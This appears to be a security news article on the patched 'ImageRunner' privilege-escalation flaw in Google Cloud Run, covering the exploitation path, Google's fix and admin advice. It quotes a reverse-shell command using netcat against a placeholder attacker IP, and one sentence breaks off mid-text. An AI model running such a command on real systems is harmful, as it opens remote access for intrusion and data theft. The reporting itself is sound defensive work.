A significant security vulnerability in Google Cloud Platform (GCP) was recently discovered, potentially allowing attackers
to access private container images stored in Google Artifact Registry and Google Container Registry.
Dubbed "ImageRunner," the vulnerability has been patched, but it highlights a serious privilege escalation risk, exposing sensitive cloud resources to unauthorized access.
The ImageRunner Vulnerability
According to Tenable Research, the flaw primarily affected Google Cloud Run, a fully managed service for running containerized applications in a serverless environment.
The issue stemmed from how Cloud Run handled permissions during container deployment. Users with edit permissions on Cloud Run revisions (run.services.update and iam.serviceAccounts.actAs) could exploit this weakness to access private container images without having the typically required registry permissions, such as Storage Object Viewer or Artifact Registry Reader.
When deploying a Cloud Run service, a new revision is created, representing a specific version of the deployed service. During this process, Cloud Run uses a service agent with elevated permissions to pull container images from registries, making it a potential target for exploitation.
Exploitation Method
An attacker exploiting this vulnerability could:
- Control an identity with run.services.update and iam.serviceAccounts.actAs permissions.
- Update an active Cloud Run service and create a new revision
- Specify any private container image within the same project
- Inject malicious instructions as arguments or commands
For example, an attacker could reference a private "ncat" image and execute the following command to establish a reverse shell:
nc [attacker_ip] [port] -e /bin/bash
Once executed, this would give the attacker access to the container, allowing them to inspect its contents, extract secrets, or exfiltrate sensitive data.
The attack was possible because Cloud Run's service agent (
The "Jenga®" Effect in Cloud Security
Tenable Research likened this vulnerability to a "Jenga®" scenario, where cloud services stack on top of each other, inheriting security risks from the underlying layers. If one core service is compromised, everything built on top of it becomes vulnerable.
This pattern has been observed across major cloud providers, posing a significant challenge for security teams trying to safeguard cloud environments.
Google's Security Fix
To mitigate this vulnerability, Google introduced a critical security update:
- The principal creating or updating a Cloud Run resource must now have explicit permission to access the container images being deployed.
- Specifically, when using Artifact Registry, the principal must hold the Artifact Registry Reader (roles/artifactregistry.reader) IAM role on the project or repository containing the container images.
The fix was fully rolled out to production on January 28, 2025, after advance notifications were sent to affected Project, Folder, and Organization owners in November 2024.
Recommendations for Cloud Admins
Organizations using Google Cloud Platform (GCP) should:
Enforce least privilege IAM policies to limit unnecessary permissions
Ensure that only authorized identities with appropriate registry permissions perform Cloud Run deployments
Monitor Cloud Run revision updates for suspicious activity
Consider additional security controls for container deployments.
This vulnerability is a reminder that cloud security requires constant vigilance, especially against complex privilege escalation paths that may not be immediately apparent in multi-service architectures.
Found this article interesting? Follow us on X(Twitter) and FaceBook to read more exclusive content we post.
